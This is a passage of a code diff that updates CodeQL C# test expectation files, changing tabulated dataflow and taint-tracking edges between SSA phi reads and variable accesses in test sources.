UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2792:24:2792 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2803:24:2808 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2803:24:2808 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2803:24:2808 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2807:24:2807 | access to local variable x | UseUseExplosion.cs:24:2803:24:2808 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2818:24:2823 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2818:24:2823 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2807:24:2807 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2818:24:2823 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2818:24:2823 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2818:24:2823 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2822:24:2822 | access to local variable x | UseUseExplosion.cs:24:2818:24:2823 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2833:24:2838 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2833:24:2838 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2822:24:2822 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2833:24:2838 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2833:24:2838 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2833:24:2838 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2837:24:2837 | access to local variable x | UseUseExplosion.cs:24:2833:24:2838 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2848:24:2853 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2848:24:2853 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2837:24:2837 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2848:24:2853 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2848:24:2853 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2848:24:2853 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2852:24:2852 | access to local variable x | UseUseExplosion.cs:24:2848:24:2853 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2863:24:2868 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2863:24:2868 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2852:24:2852 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2863:24:2868 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2863:24:2868 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2863:24:2868 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2867:24:2867 | access to local variable x | UseUseExplosion.cs:24:2863:24:2868 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2878:24:2883 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2878:24:2883 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2867:24:2867 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2878:24:2883 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2878:24:2883 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2878:24:2883 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2882:24:2882 | access to local variable x | UseUseExplosion.cs:24:2878:24:2883 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2893:24:2898 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2893:24:2898 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2882:24:2882 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2893:24:2898 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2893:24:2898 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2893:24:2898 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2897:24:2897 | access to local variable x | UseUseExplosion.cs:24:2893:24:2898 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2908:24:2913 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2908:24:2913 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2897:24:2897 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2908:24:2913 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2908:24:2913 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2908:24:2913 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2912:24:2912 | access to local variable x | UseUseExplosion.cs:24:2908:24:2913 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2912:24:2912 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2923:24:2928 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2923:24:2928 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2927:24:2927 | access to local variable x | UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2927:24:2927 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2938:24:2943 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2938:24:2943 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2942:24:2942 | access to local variable x | UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2942:24:2942 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2953:24:2958 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2953:24:2958 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2957:24:2957 | access to local variable x | UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2957:24:2957 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2968:24:2973 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2968:24:2973 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2972:24:2972 | access to local variable x | UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2972:24:2972 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2983:24:2988 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2983:24:2988 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2987:24:2987 | access to local variable x | UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2987:24:2987 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2998:24:3003 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2998:24:3003 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3002:24:3002 | access to local variable x | UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3002:24:3002 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3013:24:3018 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3013:24:3018 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3017:24:3017 | access to local variable x | UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3017:24:3017 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3028:24:3033 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3028:24:3033 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3032:24:3032 | access to local variable x | UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3032:24:3032 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3043:24:3048 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3043:24:3048 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3047:24:3047 | access to local variable x | UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3047:24:3047 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3058:24:3063 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3058:24:3063 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3062:24:3062 | access to local variable x | UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3062:24:3062 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3073:24:3078 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3073:24:3078 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3077:24:3077 | access to local variable x | UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3077:24:3077 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3088:24:3093 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3088:24:3093 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3092:24:3092 | access to local variable x | UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3092:24:3092 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3103:24:3108 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3103:24:3108 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3107:24:3107 | access to local variable x | UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3107:24:3107 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3118:24:3123 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3118:24:3123 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3122:24:3122 | access to local variable x | UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3122:24:3122 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3133:24:3138 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3133:24:3138 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3137:24:3137 | access to local variable x | UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3137:24:3137 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3148:24:3153 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3148:24:3153 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3152:24:3152 | access to local variable x | UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3152:24:3152 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3163:24:3168 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3163:24:3168 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3167:24:3167 | access to local variable x | UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3167:24:3167 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3178:24:3183 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3178:24:3183 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3182:24:3182 | access to local variable x | UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3182:24:3182 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3193:24:3198 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3193:24:3198 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3197:24:3197 | access to local variable x | UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(x) | -| UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | +| UseUseExplosion.cs:24:3197:24:3197 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | UseUseExplosion.cs:25:1712:25:1712 | access to local variable x | | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | UseUseExplosion.cs:25:1727:25:1727 | access to local variable x | | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | UseUseExplosion.cs:25:1742:25:1742 | access to local variable x | diff --git a/csharp/ql/test/library-tests/dataflow/local/TaintTrackingStep.expected b/csharp/ql/test/library-tests/dataflow/local/TaintTrackingStep.expected index ea0ae7f9da73..48bf36691e01 100644 --- a/csharp/ql/test/library-tests/dataflow/local/TaintTrackingStep.expected +++ b/csharp/ql/test/library-tests/dataflow/local/TaintTrackingStep.expected @@ -80,11 +80,10 @@ | LocalDataFlow.cs:88:9:88:16 | access to local variable nonSink0 | LocalDataFlow.cs:88:9:88:36 | SSA def(nonSink0) | | LocalDataFlow.cs:88:9:88:36 | SSA def(nonSink0) | LocalDataFlow.cs:89:15:89:22 | access to local variable nonSink0 | | LocalDataFlow.cs:88:20:88:36 | ... ? ... : ... | LocalDataFlow.cs:88:9:88:16 | access to local variable nonSink0 | -| LocalDataFlow.cs:88:20:88:36 | SSA phi(sink7) | LocalDataFlow.cs:92:29:92:33 | access to local variable sink7 | | LocalDataFlow.cs:88:24:88:28 | "abc" | LocalDataFlow.cs:88:20:88:36 | ... ? ... : ... | -| LocalDataFlow.cs:88:24:88:28 | [input] SSA phi(sink7) | LocalDataFlow.cs:88:20:88:36 | SSA phi(sink7) | +| LocalDataFlow.cs:88:24:88:28 | [input] SSA phi(sink7) | LocalDataFlow.cs:92:29:92:33 | access to local variable sink7 | | LocalDataFlow.cs:88:32:88:36 | "def" | LocalDataFlow.cs:88:20:88:36 | ... ? ... : ... | -| LocalDataFlow.cs:88:32:88:36 | [input] SSA phi(sink7) | LocalDataFlow.cs:88:20:88:36 | SSA phi(sink7) | +| LocalDataFlow.cs:88:32:88:36 | [input] SSA phi(sink7) | LocalDataFlow.cs:92:29:92:33 | access to local variable sink7 | | LocalDataFlow.cs:89:15:89:22 | [post] access to local variable nonSink0 | LocalDataFlow.cs:96:32:96:39 | access to local variable nonSink0 | | LocalDataFlow.cs:89:15:89:22 | access to local variable nonSink0 | LocalDataFlow.cs:96:32:96:39 | access to local variable nonSink0 | | LocalDataFlow.cs:92:13:92:17 | access to local variable sink8 | LocalDataFlow.cs:92:13:92:33 | SSA def(sink8) | @@ -589,14 +588,12 @@ | LocalDataFlow.cs:307:18:307:33 | String nonSink17 | LocalDataFlow.cs:307:18:307:33 | SSA def(nonSink17) | | LocalDataFlow.cs:313:13:313:18 | access to local variable sink73 | LocalDataFlow.cs:313:13:313:38 | SSA def(sink73) | | LocalDataFlow.cs:313:13:313:38 | SSA def(sink73) | LocalDataFlow.cs:315:15:315:20 | access to local variable sink73 | -| LocalDataFlow.cs:313:22:313:29 | [input] SSA phi read(sink0) | LocalDataFlow.cs:313:22:313:38 | SSA phi read(sink0) | +| LocalDataFlow.cs:313:22:313:29 | [input] SSA phi read(sink0) | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | | LocalDataFlow.cs:313:22:313:29 | access to local variable nonSink0 | LocalDataFlow.cs:313:22:313:38 | ... ?? ... | | LocalDataFlow.cs:313:22:313:29 | access to local variable nonSink0 | LocalDataFlow.cs:314:31:314:38 | access to local variable nonSink0 | | LocalDataFlow.cs:313:22:313:38 | ... ?? ... | LocalDataFlow.cs:313:13:313:18 | access to local variable sink73 | -| LocalDataFlow.cs:313:22:313:38 | SSA phi read(sink0) | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | -| LocalDataFlow.cs:313:34:313:38 | [input] SSA phi read(sink0) | LocalDataFlow.cs:313:22:313:38 | SSA phi read(sink0) | | LocalDataFlow.cs:313:34:313:38 | access to local variable sink0 | LocalDataFlow.cs:313:22:313:38 | ... ?? ... | -| LocalDataFlow.cs:313:34:313:38 | access to local variable sink0 | LocalDataFlow.cs:313:34:313:38 | [input] SSA phi read(sink0) | +| LocalDataFlow.cs:313:34:313:38 | access to local variable sink0 | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | | LocalDataFlow.cs:314:13:314:18 | access to local variable sink74 | LocalDataFlow.cs:314:13:314:38 | SSA def(sink74) | | LocalDataFlow.cs:314:13:314:38 | SSA def(sink74) | LocalDataFlow.cs:316:15:316:20 | access to local variable sink74 | | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | LocalDataFlow.cs:314:22:314:38 | ... ?? ... | @@ -636,12 +633,10 @@ | LocalDataFlow.cs:373:13:373:25 | SSA def(x) | LocalDataFlow.cs:374:17:374:18 | [input] SSA phi(x) | | LocalDataFlow.cs:373:13:373:25 | SSA def(x) | LocalDataFlow.cs:376:35:376:35 | access to local variable x | | LocalDataFlow.cs:373:17:373:25 | "tainted" | LocalDataFlow.cs:373:13:373:13 | access to local variable x | -| LocalDataFlow.cs:374:17:374:18 | [input] SSA phi(x) | LocalDataFlow.cs:382:9:382:17 | SSA phi(x) | +| LocalDataFlow.cs:374:17:374:18 | [input] SSA phi(x) | LocalDataFlow.cs:382:15:382:15 | access to local variable x | | LocalDataFlow.cs:381:13:381:13 | access to local variable x | LocalDataFlow.cs:381:13:381:29 | SSA def(x) | -| LocalDataFlow.cs:381:13:381:29 | SSA def(x) | 